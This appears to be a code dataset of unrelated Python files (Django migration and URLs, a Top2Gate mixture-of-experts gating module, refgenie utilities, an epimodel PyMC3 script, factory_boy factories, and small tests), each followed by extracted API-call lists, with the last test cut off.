# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-09 14:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('daiquiri_files', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='directory',
name='depth',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='directory',
name='path',
field=models.CharField(blank=True, help_text='Path of the directory.', max_length=256, verbose_name='Path'),
),
]
| [
"django.db.models.CharField",
"django.db.models.IntegerField"
] | [((397, 427), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (416, 427), False, 'from django.db import migrations, models\n'), ((550, 656), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'help_text': '"""Path of the directory."""', 'max_length': '(256)', 'verbose_name': '"""Path"""'}), "(blank=True, help_text='Path of the directory.', max_length\n =256, verbose_name='Path')\n", (566, 656), False, 'from django.db import migrations, models\n')] |
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
#
# This source code is licensed under the BSD license found in the
# LICENSE file in the root directory of this source tree.
# Implementation of Top2Gating described in https://arxiv.org/pdf/2006.16668.pdf
# Code is inspired by Top2GatingOnLogits from lingvo:
# https://github.com/tensorflow/lingvo/blob/21b8106c5f1d30a196c98eedc441d4fd70833b11/lingvo/core/moe_layers.py#L477
from typing import Callable, Dict, Tuple
import torch
from torch import Tensor
import torch.nn.functional as F
gumbel_map: Dict[torch.device, Callable] = {}
def gumbel_rsample(shape: Tuple, device: torch.device) -> Tensor:
gumbel = gumbel_map.get(device)
if gumbel is None:
one = torch.tensor(1.0, device=device)
zero = torch.tensor(0.0, device=device)
gumbel = torch.distributions.gumbel.Gumbel(zero, one).rsample # type: ignore
gumbel_map[device] = gumbel
return gumbel(shape)
def top2gating(logits: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]:
"""Implements Top2Gating on logits."""
gates = F.softmax(logits, dim=1)
# gates has shape of SE
num_tokens = gates.shape[0]
num_experts = gates.shape[1]
# capacity = 2S/E
capacity = 2 * num_tokens // num_experts
assert num_tokens % num_experts == 0
# Create a mask for 1st's expert per token
indices1_s = torch.argmax(gates, dim=1)
mask1 = F.one_hot(indices1_s, num_classes=num_experts)
# Create a mask for 2nd's expert per token using Gumbel-max trick
# https://timvieira.github.io/blog/post/2014/07/31/gumbel-max-trick/
logits_w_noise = logits + gumbel_rsample(logits.shape, device=logits.device)
# Replace top-expert with min value
logits_except1 = logits_w_noise.masked_fill(mask1.bool(), float("-inf"))
indices2_s = torch.argmax(logits_except1, dim=1)
mask2 = F.one_hot(indices2_s, num_classes=num_experts)
# Compute locations in capacity buffer
locations1 = torch.cumsum(mask1, dim=0) - 1
locations2 = torch.cumsum(mask2, dim=0) - 1
# Update 2nd's location by accounting for locations of 1st
locations2 += torch.sum(mask1, dim=0, keepdim=True)
# Compute l_aux
me = torch.mean(gates, dim=0)
ce = torch.mean(mask1.float(), dim=0)
l_aux = torch.mean(me * ce)
# Remove locations outside capacity from mask
mask1 *= torch.lt(locations1, capacity)
mask2 *= torch.lt(locations2, capacity)
# Store the capacity location for each token
locations1_s = torch.sum(locations1 * mask1, dim=1)
locations2_s = torch.sum(locations2 * mask2, dim=1)
# Normalize gate probabilities
mask1_float = mask1.float()
mask2_float = mask2.float()
gates1_s = torch.einsum("se,se->s", gates, mask1_float)
gates2_s = torch.einsum("se,se->s", gates, mask2_float)
denom_s = gates1_s + gates2_s
# Avoid divide-by-zero
denom_s = torch.clamp(denom_s, min=torch.finfo(denom_s.dtype).eps)
gates1_s /= denom_s
gates2_s /= denom_s
# Calculate combine_weights and dispatch_mask
gates1 = torch.einsum("s,se->se", gates1_s, mask1_float)
gates2 = torch.einsum("s,se->se", gates2_s, mask2_float)
locations1_sc = F.one_hot(locations1_s, num_classes=capacity)
locations2_sc = F.one_hot(locations2_s, num_classes=capacity)
combine1_sec = torch.einsum("se,sc->sec", gates1, locations1_sc)
combine2_sec = torch.einsum("se,sc->sec", gates2, locations2_sc)
combine_weights = combine1_sec + combine2_sec
dispatch_mask = combine_weights.bool()
return l_aux, combine_weights, dispatch_mask
class Top2Gate(torch.nn.Module):
"""Gate module which implements Top2Gating as described in Gshard_.
::
gate = Top2Gate(model_dim, num_experts)
l_aux, combine_weights, dispatch_mask = gate(input)
.. Gshard_: https://arxiv.org/pdf/2006.16668.pdf
Args:
model_dim (int):
size of model embedding dimension
num_experts (ints):
number of experts in model
"""
wg: torch.nn.Linear
def __init__(self, model_dim: int, num_experts: int,) -> None:
super().__init__()
self.wg = torch.nn.Linear(model_dim, num_experts, bias=False)
def forward(self, input: torch.Tensor) -> Tuple[Tensor, Tensor, Tensor]: # type: ignore
logits = self.wg(input)
return top2gating(logits)
| [
"torch.mean",
"torch.distributions.gumbel.Gumbel",
"torch.finfo",
"torch.argmax",
"torch.nn.functional.one_hot",
"torch.lt",
"torch.nn.functional.softmax",
"torch.einsum",
"torch.cumsum",
"torch.nn.Linear",
"torch.sum",
"torch.tensor"
] | [((1109, 1133), 'torch.nn.functional.softmax', 'F.softmax', (['logits'], {'dim': '(1)'}), '(logits, dim=1)\n', (1118, 1133), True, 'import torch.nn.functional as F\n'), ((1401, 1427), 'torch.argmax', 'torch.argmax', (['gates'], {'dim': '(1)'}), '(gates, dim=1)\n', (1413, 1427), False, 'import torch\n'), ((1440, 1486), 'torch.nn.functional.one_hot', 'F.one_hot', (['indices1_s'], {'num_classes': 'num_experts'}), '(indices1_s, num_classes=num_experts)\n', (1449, 1486), True, 'import torch.nn.functional as F\n'), ((1846, 1881), 'torch.argmax', 'torch.argmax', (['logits_except1'], {'dim': '(1)'}), '(logits_except1, dim=1)\n', (1858, 1881), False, 'import torch\n'), ((1894, 1940), 'torch.nn.functional.one_hot', 'F.one_hot', (['indices2_s'], {'num_classes': 'num_experts'}), '(indices2_s, num_classes=num_experts)\n', (1903, 1940), True, 'import torch.nn.functional as F\n'), ((2162, 2199), 'torch.sum', 'torch.sum', (['mask1'], {'dim': '(0)', 'keepdim': '(True)'}), '(mask1, dim=0, keepdim=True)\n', (2171, 2199), False, 'import torch\n'), ((2230, 2254), 'torch.mean', 'torch.mean', (['gates'], {'dim': '(0)'}), '(gates, dim=0)\n', (2240, 2254), False, 'import torch\n'), ((2309, 2328), 'torch.mean', 'torch.mean', (['(me * ce)'], {}), '(me * ce)\n', (2319, 2328), False, 'import torch\n'), ((2393, 2423), 'torch.lt', 'torch.lt', (['locations1', 'capacity'], {}), '(locations1, capacity)\n', (2401, 2423), False, 'import torch\n'), ((2437, 2467), 'torch.lt', 'torch.lt', (['locations2', 'capacity'], {}), '(locations2, capacity)\n', (2445, 2467), False, 'import torch\n'), ((2537, 2573), 'torch.sum', 'torch.sum', (['(locations1 * mask1)'], {'dim': '(1)'}), '(locations1 * mask1, dim=1)\n', (2546, 2573), False, 'import torch\n'), ((2593, 2629), 'torch.sum', 'torch.sum', (['(locations2 * mask2)'], {'dim': '(1)'}), '(locations2 * mask2, dim=1)\n', (2602, 2629), False, 'import torch\n'), ((2745, 2789), 'torch.einsum', 'torch.einsum', (['"""se,se->s"""', 'gates', 'mask1_float'], {}), "('se,se->s', gates, mask1_float)\n", (2757, 2789), False, 'import torch\n'), ((2805, 2849), 'torch.einsum', 'torch.einsum', (['"""se,se->s"""', 'gates', 'mask2_float'], {}), "('se,se->s', gates, mask2_float)\n", (2817, 2849), False, 'import torch\n'), ((3094, 3141), 'torch.einsum', 'torch.einsum', (['"""s,se->se"""', 'gates1_s', 'mask1_float'], {}), "('s,se->se', gates1_s, mask1_float)\n", (3106, 3141), False, 'import torch\n'), ((3155, 3202), 'torch.einsum', 'torch.einsum', (['"""s,se->se"""', 'gates2_s', 'mask2_float'], {}), "('s,se->se', gates2_s, mask2_float)\n", (3167, 3202), False, 'import torch\n'), ((3223, 3268), 'torch.nn.functional.one_hot', 'F.one_hot', (['locations1_s'], {'num_classes': 'capacity'}), '(locations1_s, num_classes=capacity)\n', (3232, 3268), True, 'import torch.nn.functional as F\n'), ((3289, 3334), 'torch.nn.functional.one_hot', 'F.one_hot', (['locations2_s'], {'num_classes': 'capacity'}), '(locations2_s, num_classes=capacity)\n', (3298, 3334), True, 'import torch.nn.functional as F\n'), ((3354, 3403), 'torch.einsum', 'torch.einsum', (['"""se,sc->sec"""', 'gates1', 'locations1_sc'], {}), "('se,sc->sec', gates1, locations1_sc)\n", (3366, 3403), False, 'import torch\n'), ((3423, 3472), 'torch.einsum', 'torch.einsum', (['"""se,sc->sec"""', 'gates2', 'locations2_sc'], {}), "('se,sc->sec', gates2, locations2_sc)\n", (3435, 3472), False, 'import torch\n'), ((753, 785), 'torch.tensor', 'torch.tensor', (['(1.0)'], {'device': 'device'}), '(1.0, device=device)\n', (765, 785), False, 'import torch\n'), ((801, 833), 
'torch.tensor', 'torch.tensor', (['(0.0)'], {'device': 'device'}), '(0.0, device=device)\n', (813, 833), False, 'import torch\n'), ((2002, 2028), 'torch.cumsum', 'torch.cumsum', (['mask1'], {'dim': '(0)'}), '(mask1, dim=0)\n', (2014, 2028), False, 'import torch\n'), ((2050, 2076), 'torch.cumsum', 'torch.cumsum', (['mask2'], {'dim': '(0)'}), '(mask2, dim=0)\n', (2062, 2076), False, 'import torch\n'), ((4188, 4239), 'torch.nn.Linear', 'torch.nn.Linear', (['model_dim', 'num_experts'], {'bias': '(False)'}), '(model_dim, num_experts, bias=False)\n', (4203, 4239), False, 'import torch\n'), ((851, 895), 'torch.distributions.gumbel.Gumbel', 'torch.distributions.gumbel.Gumbel', (['zero', 'one'], {}), '(zero, one)\n', (884, 895), False, 'import torch\n'), ((2950, 2976), 'torch.finfo', 'torch.finfo', (['denom_s.dtype'], {}), '(denom_s.dtype)\n', (2961, 2976), False, 'import torch\n')] |
import errno
import os
from refgenconf import MissingRecipeError
from ubiquerg import is_writable
from .asset_build_packages import asset_build_packages
from .exceptions import MissingFolderError
def _parse_user_build_input(input):
"""
Parse user input specification. Used in build for specific parents and input parsing.
:param Iterable[Iterable[str], ...] input: user command line input,
formatted as follows: [[fasta=txt, test=txt], ...]
    :return dict: mapping of input names to their values
"""
lst = []
for i in input or []:
lst.extend(i)
return (
{x.split("=")[0]: x.split("=")[1] for x in lst if "=" in x}
if lst is not None
else lst
)
def _single_folder_writeable(d):
return os.access(d, os.W_OK) and os.access(d, os.X_OK)
def _writeable(outdir, strict_exists=False):
outdir = outdir or "."
if os.path.exists(outdir):
return _single_folder_writeable(outdir)
elif strict_exists:
raise MissingFolderError(outdir)
return _writeable(os.path.dirname(outdir), strict_exists)
def _raise_missing_recipe_error(recipe):
"""
Raise an error for a missing recipe, when one is requested
:param str recipe: recipe name
:raise MissingRecipeError: always
"""
raise MissingRecipeError(
f"Recipe '{recipe}' not found. Available recipes: "
f"{', '.join(list(asset_build_packages.keys()))}"
)
def _skip_lock(skip_arg, cfg):
"""
If config read lock skip was not forced, check if dir is writable and set
the default to the result
:param bool skip_arg: argument selected on the CLI
    :param str cfg: path to the config file
:return bool: decision -- whether to skip the file lock for read
"""
return is_writable(os.path.dirname(cfg)) if not skip_arg else True
def make_sure_path_exists(path):
"""
Creates all directories in a path if it does not exist.
:param str path: Path to create.
:raises Exception: if the path creation attempt hits an error with
a code indicating a cause other than pre-existence.
"""
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
| [
"os.makedirs",
"os.path.dirname",
"os.path.exists",
"os.access"
] | [((909, 931), 'os.path.exists', 'os.path.exists', (['outdir'], {}), '(outdir)\n', (923, 931), False, 'import os\n'), ((780, 801), 'os.access', 'os.access', (['d', 'os.W_OK'], {}), '(d, os.W_OK)\n', (789, 801), False, 'import os\n'), ((806, 827), 'os.access', 'os.access', (['d', 'os.X_OK'], {}), '(d, os.X_OK)\n', (815, 827), False, 'import os\n'), ((1068, 1091), 'os.path.dirname', 'os.path.dirname', (['outdir'], {}), '(outdir)\n', (1083, 1091), False, 'import os\n'), ((2147, 2164), 'os.makedirs', 'os.makedirs', (['path'], {}), '(path)\n', (2158, 2164), False, 'import os\n'), ((1802, 1822), 'os.path.dirname', 'os.path.dirname', (['cfg'], {}), '(cfg)\n', (1817, 1822), False, 'import os\n')] |
from django.conf.urls import patterns, include, url
urlpatterns = patterns('',
url(r'^', include('demo.urls')),
url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'nuit/generic/login.html'}),
url(r'^logout/$', 'django.contrib.auth.views.logout'),
)
| [
"django.conf.urls.include",
"django.conf.urls.url"
] | [((121, 221), 'django.conf.urls.url', 'url', (['"""^login/$"""', '"""django.contrib.auth.views.login"""', "{'template_name': 'nuit/generic/login.html'}"], {}), "('^login/$', 'django.contrib.auth.views.login', {'template_name':\n 'nuit/generic/login.html'})\n", (124, 221), False, 'from django.conf.urls import patterns, include, url\n'), ((224, 276), 'django.conf.urls.url', 'url', (['"""^logout/$"""', '"""django.contrib.auth.views.logout"""'], {}), "('^logout/$', 'django.contrib.auth.views.logout')\n", (227, 276), False, 'from django.conf.urls import patterns, include, url\n'), ((94, 114), 'django.conf.urls.include', 'include', (['"""demo.urls"""'], {}), "('demo.urls')\n", (101, 114), False, 'from django.conf.urls import patterns, include, url\n')] |
"""
:code:`iceswe.py`
Hold out both Iceland and Sweden.
"""
import pymc3 as pm
from epimodel import EpidemiologicalParameters
from epimodel.preprocessing.data_preprocessor import preprocess_data
import argparse
import pickle
from scripts.sensitivity_analysis.utils import *
import os
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['MKL_NUM_THREADS'] = '1'
os.environ['OPENBLAS_NUM_THREADS'] = '1'
argparser = argparse.ArgumentParser()
add_argparse_arguments(argparser)
if __name__ == '__main__':
args, extras = argparser.parse_known_args()
data = preprocess_data(get_data_path(), last_day='2020-05-30')
data.mask_reopenings()
if 'deaths_only' in args.model_type:
data.remove_regions_min_deaths(5)
data.mask_region('IS')
data.mask_region('SE')
ep = EpidemiologicalParameters()
model_class = get_model_class_from_str(args.model_type)
bd = {**ep.get_model_build_dict(), **parse_extra_model_args(extras)}
pprint_mb_dict(bd)
with model_class(data) as model:
model.build_model(**bd)
ta = get_target_accept_from_model_str(args.model_type)
with model.model:
model.trace = pm.sample(args.n_samples, tune=500, chains=args.n_chains, cores=args.n_chains, max_treedepth=14,
target_accept=ta, init='adapt_diag')
save_cm_trace(f'iceswe.txt', model.trace.CMReduction, args.exp_tag,
generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))
if model.country_specific_effects:
nS, nCMs = model.trace.CMReduction.shape
full_trace = np.exp(
np.log(model.trace.CMReduction) + np.random.normal(size=(nS, nCMs)) * model.trace.CMAlphaScales)
save_cm_trace('iceswe-cs.txt', full_trace, args.exp_tag,
generate_base_output_dir(args.model_type, parse_extra_model_args(extras)))
| [
"pymc3.sample",
"epimodel.EpidemiologicalParameters",
"argparse.ArgumentParser"
] | [((415, 440), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (438, 440), False, 'import argparse\n'), ((795, 822), 'epimodel.EpidemiologicalParameters', 'EpidemiologicalParameters', ([], {}), '()\n', (820, 822), False, 'from epimodel import EpidemiologicalParameters\n'), ((1155, 1293), 'pymc3.sample', 'pm.sample', (['args.n_samples'], {'tune': '(500)', 'chains': 'args.n_chains', 'cores': 'args.n_chains', 'max_treedepth': '(14)', 'target_accept': 'ta', 'init': '"""adapt_diag"""'}), "(args.n_samples, tune=500, chains=args.n_chains, cores=args.\n n_chains, max_treedepth=14, target_accept=ta, init='adapt_diag')\n", (1164, 1293), True, 'import pymc3 as pm\n')] |
import datetime
import random
import factory
import factory.fuzzy as fuzzy
from django.core.files.base import ContentFile
from courses import models
from courses.models import LANGUAGE_CHOICES, PROFILE_CHOICES
from tests.users import factories as users_factories
from users import models as users_models
PROFILE_CHOICES = [x[0] for x in PROFILE_CHOICES]
LANGUAGE_CHOICES = [x[0] for x in LANGUAGE_CHOICES]
class GradeFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Grade
name = factory.Sequence(lambda n: "Grade %03d" % n)
start_year = factory.Faker('date_object')
supervisor = factory.SubFactory(users_factories.StudentFactory)
profile = fuzzy.FuzzyChoice(PROFILE_CHOICES)
@factory.post_generation
def students(self, create, extracted, **kwargs):
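        # Attach the explicitly passed students; otherwise add 10 random existing ones.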
if not create:
return
if extracted:
for student in extracted:
self.students.add(student)
else:
random_students = random.choices(users_models.Student.objects.all(), k=10)
for student in random_students:
self.students.add(student)
class CourseFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Course
name = factory.Sequence(lambda n: "Course %02d" % n)
description = factory.Faker('text')
head_teacher = factory.SubFactory(users_factories.TeacherFactory)
grade = factory.SubFactory(GradeFactory)
code_meu = '123'
has_exam = False
semester = fuzzy.FuzzyChoice([i for i in range(1, 8)])
language = fuzzy.FuzzyChoice(LANGUAGE_CHOICES)
lecture_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)])
labs_hours = fuzzy.FuzzyChoice([i for i in range(1, 40)])
@factory.post_generation
def teachers(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for teacher in extracted:
self.teachers.add(teacher)
else:
random_teachers = random.choices(users_models.Teacher.objects.all(), k=5)
for teacher in random_teachers:
self.teachers.add(teacher)
class LectureFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Lecture
course = factory.SubFactory(CourseFactory)
title = fuzzy.FuzzyText(length=16)
description = factory.Faker('text')
date = fuzzy.FuzzyDate(
start_date=datetime.date.today() - datetime.timedelta(days=100),
end_date=datetime.date.today() + datetime.timedelta(days=100),
)
class GroupFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseGroup
name = fuzzy.FuzzyText(length=16)
@factory.post_generation
def students(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for student in extracted:
self.students.add(student)
class LabFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Laboratory
course = factory.SubFactory(CourseFactory)
group = factory.SubFactory(GroupFactory)
title = fuzzy.FuzzyText(length=16)
description = factory.Faker('text')
date = fuzzy.FuzzyDate(
start_date=datetime.date.today() - datetime.timedelta(days=100),
end_date=datetime.date.today() + datetime.timedelta(days=100),
)
class CourseGroupFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseGroup
course = factory.SubFactory(CourseFactory)
name = fuzzy.FuzzyText(length=16)
class CourseMarkFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseMark
mark = 65
date = fuzzy.FuzzyDate(datetime.date.today())
description = factory.Faker('text')
course = factory.SubFactory(CourseFactory)
student = factory.SubFactory(users_factories.StudentFactory)
teacher = factory.SubFactory(users_factories.TeacherFactory)
class FinalCourseMarkFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.FinalCourseMark
mark = 5
date = fuzzy.FuzzyDate(datetime.date.today())
description = factory.Faker('text')
course = factory.SubFactory(CourseFactory)
student = factory.SubFactory(users_factories.StudentFactory)
teacher = factory.SubFactory(users_factories.TeacherFactory)
class NoticeFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseNotice
course = factory.SubFactory(CourseFactory)
sender = factory.SubFactory(users_factories.TeacherFactory)
title = fuzzy.FuzzyText(length=16)
content = factory.Faker('text')
created_at = fuzzy.FuzzyDate(datetime.date.today())
class AssignmentFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.Assignment
laboratory = factory.SubFactory(LabFactory)
teacher = factory.SubFactory(users_factories.TeacherFactory)
deadline = fuzzy.FuzzyDate(datetime.date.today())
title = fuzzy.FuzzyText(length=16)
content = factory.Faker('text')
class CourseFileFactory(factory.django.DjangoModelFactory):
class Meta:
model = models.CourseFile
name = fuzzy.FuzzyText(length=16)
description = factory.Faker('text')
file = factory.LazyAttribute(
lambda _: ContentFile(
factory.django.ImageField()._make_data(
{'width': 600, 'height': 600}
), 'example.jpg'
)
)
created_at = fuzzy.FuzzyDate(datetime.date.today())
updated_at = fuzzy.FuzzyDate(datetime.date.today()) | [
"factory.django.ImageField",
"factory.Faker",
"factory.fuzzy.FuzzyText",
"users.models.Student.objects.all",
"factory.SubFactory",
"datetime.date.today",
"factory.fuzzy.FuzzyChoice",
"factory.Sequence",
"users.models.Teacher.objects.all",
"datetime.timedelta"
] | [((523, 567), 'factory.Sequence', 'factory.Sequence', (["(lambda n: 'Grade %03d' % n)"], {}), "(lambda n: 'Grade %03d' % n)\n", (539, 567), False, 'import factory\n'), ((585, 613), 'factory.Faker', 'factory.Faker', (['"""date_object"""'], {}), "('date_object')\n", (598, 613), False, 'import factory\n'), ((631, 681), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.StudentFactory'], {}), '(users_factories.StudentFactory)\n', (649, 681), False, 'import factory\n'), ((696, 730), 'factory.fuzzy.FuzzyChoice', 'fuzzy.FuzzyChoice', (['PROFILE_CHOICES'], {}), '(PROFILE_CHOICES)\n', (713, 730), True, 'import factory.fuzzy as fuzzy\n'), ((1263, 1308), 'factory.Sequence', 'factory.Sequence', (["(lambda n: 'Course %02d' % n)"], {}), "(lambda n: 'Course %02d' % n)\n", (1279, 1308), False, 'import factory\n'), ((1327, 1348), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (1340, 1348), False, 'import factory\n'), ((1368, 1418), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.TeacherFactory'], {}), '(users_factories.TeacherFactory)\n', (1386, 1418), False, 'import factory\n'), ((1431, 1463), 'factory.SubFactory', 'factory.SubFactory', (['GradeFactory'], {}), '(GradeFactory)\n', (1449, 1463), False, 'import factory\n'), ((1580, 1615), 'factory.fuzzy.FuzzyChoice', 'fuzzy.FuzzyChoice', (['LANGUAGE_CHOICES'], {}), '(LANGUAGE_CHOICES)\n', (1597, 1615), True, 'import factory.fuzzy as fuzzy\n'), ((2277, 2310), 'factory.SubFactory', 'factory.SubFactory', (['CourseFactory'], {}), '(CourseFactory)\n', (2295, 2310), False, 'import factory\n'), ((2323, 2349), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (2338, 2349), True, 'import factory.fuzzy as fuzzy\n'), ((2368, 2389), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (2381, 2389), False, 'import factory\n'), ((2687, 2713), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (2702, 2713), True, 'import factory.fuzzy as fuzzy\n'), ((3060, 3093), 'factory.SubFactory', 'factory.SubFactory', (['CourseFactory'], {}), '(CourseFactory)\n', (3078, 3093), False, 'import factory\n'), ((3106, 3138), 'factory.SubFactory', 'factory.SubFactory', (['GroupFactory'], {}), '(GroupFactory)\n', (3124, 3138), False, 'import factory\n'), ((3151, 3177), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (3166, 3177), True, 'import factory.fuzzy as fuzzy\n'), ((3196, 3217), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (3209, 3217), False, 'import factory\n'), ((3523, 3556), 'factory.SubFactory', 'factory.SubFactory', (['CourseFactory'], {}), '(CourseFactory)\n', (3541, 3556), False, 'import factory\n'), ((3568, 3594), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (3583, 3594), True, 'import factory.fuzzy as fuzzy\n'), ((3789, 3810), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (3802, 3810), False, 'import factory\n'), ((3824, 3857), 'factory.SubFactory', 'factory.SubFactory', (['CourseFactory'], {}), '(CourseFactory)\n', (3842, 3857), False, 'import factory\n'), ((3872, 3922), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.StudentFactory'], {}), '(users_factories.StudentFactory)\n', (3890, 3922), False, 'import factory\n'), ((3937, 3987), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.TeacherFactory'], {}), '(users_factories.TeacherFactory)\n', (3955, 3987), False, 'import 
factory\n'), ((4192, 4213), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (4205, 4213), False, 'import factory\n'), ((4227, 4260), 'factory.SubFactory', 'factory.SubFactory', (['CourseFactory'], {}), '(CourseFactory)\n', (4245, 4260), False, 'import factory\n'), ((4275, 4325), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.StudentFactory'], {}), '(users_factories.StudentFactory)\n', (4293, 4325), False, 'import factory\n'), ((4340, 4390), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.TeacherFactory'], {}), '(users_factories.TeacherFactory)\n', (4358, 4390), False, 'import factory\n'), ((4515, 4548), 'factory.SubFactory', 'factory.SubFactory', (['CourseFactory'], {}), '(CourseFactory)\n', (4533, 4548), False, 'import factory\n'), ((4562, 4612), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.TeacherFactory'], {}), '(users_factories.TeacherFactory)\n', (4580, 4612), False, 'import factory\n'), ((4625, 4651), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (4640, 4651), True, 'import factory.fuzzy as fuzzy\n'), ((4666, 4687), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (4679, 4687), False, 'import factory\n'), ((4874, 4904), 'factory.SubFactory', 'factory.SubFactory', (['LabFactory'], {}), '(LabFactory)\n', (4892, 4904), False, 'import factory\n'), ((4919, 4969), 'factory.SubFactory', 'factory.SubFactory', (['users_factories.TeacherFactory'], {}), '(users_factories.TeacherFactory)\n', (4937, 4969), False, 'import factory\n'), ((5036, 5062), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (5051, 5062), True, 'import factory.fuzzy as fuzzy\n'), ((5077, 5098), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (5090, 5098), False, 'import factory\n'), ((5223, 5249), 'factory.fuzzy.FuzzyText', 'fuzzy.FuzzyText', ([], {'length': '(16)'}), '(length=16)\n', (5238, 5249), True, 'import factory.fuzzy as fuzzy\n'), ((5268, 5289), 'factory.Faker', 'factory.Faker', (['"""text"""'], {}), "('text')\n", (5281, 5289), False, 'import factory\n'), ((3748, 3769), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (3767, 3769), False, 'import datetime\n'), ((4151, 4172), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (4170, 4172), False, 'import datetime\n'), ((4721, 4742), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (4740, 4742), False, 'import datetime\n'), ((5001, 5022), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (5020, 5022), False, 'import datetime\n'), ((5531, 5552), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (5550, 5552), False, 'import datetime\n'), ((5587, 5608), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (5606, 5608), False, 'import datetime\n'), ((1018, 1052), 'users.models.Student.objects.all', 'users_models.Student.objects.all', ([], {}), '()\n', (1050, 1052), True, 'from users import models as users_models\n'), ((2030, 2064), 'users.models.Teacher.objects.all', 'users_models.Teacher.objects.all', ([], {}), '()\n', (2062, 2064), True, 'from users import models as users_models\n'), ((2437, 2458), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (2456, 2458), False, 'import datetime\n'), ((2461, 2489), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(100)'}), '(days=100)\n', (2479, 2489), False, 'import datetime\n'), ((2508, 2529), 'datetime.date.today', 
'datetime.date.today', ([], {}), '()\n', (2527, 2529), False, 'import datetime\n'), ((2532, 2560), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(100)'}), '(days=100)\n', (2550, 2560), False, 'import datetime\n'), ((3265, 3286), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (3284, 3286), False, 'import datetime\n'), ((3289, 3317), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(100)'}), '(days=100)\n', (3307, 3317), False, 'import datetime\n'), ((3336, 3357), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (3355, 3357), False, 'import datetime\n'), ((3360, 3388), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(100)'}), '(days=100)\n', (3378, 3388), False, 'import datetime\n'), ((5367, 5394), 'factory.django.ImageField', 'factory.django.ImageField', ([], {}), '()\n', (5392, 5394), False, 'import factory\n')] |
from redisbus.utility import DictObj
def test_dictobj():
subject_dict = {
"foo": "bar",
"left": "right"
}
subject_obj = DictObj(subject_dict)
assert hasattr(subject_obj, 'foo')
assert hasattr(subject_obj, 'left')
assert subject_obj.foo == "bar"
assert subject_obj.left == "right"
| [
"redisbus.utility.DictObj"
] | [((151, 172), 'redisbus.utility.DictObj', 'DictObj', (['subject_dict'], {}), '(subject_dict)\n', (158, 172), False, 'from redisbus.utility import DictObj\n')] |
# Copyright 2020 The Kale Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import json
import pytest
from testfixtures import mock
from kale.utils import jupyter_utils as ju
def _output_display(data):
# `data` must be a list
return [{'output_type': 'display_data', 'data': data}]
@pytest.mark.parametrize("outputs,target", [
([], ""),
# ---
(_output_display({'image/png': "bytes"}),
ju.image_html_template.format("", "bytes")),
# ---
(_output_display({'text/html': "bytes"}), "bytes"),
# ---
(_output_display({'text/plain': "bytes"}),
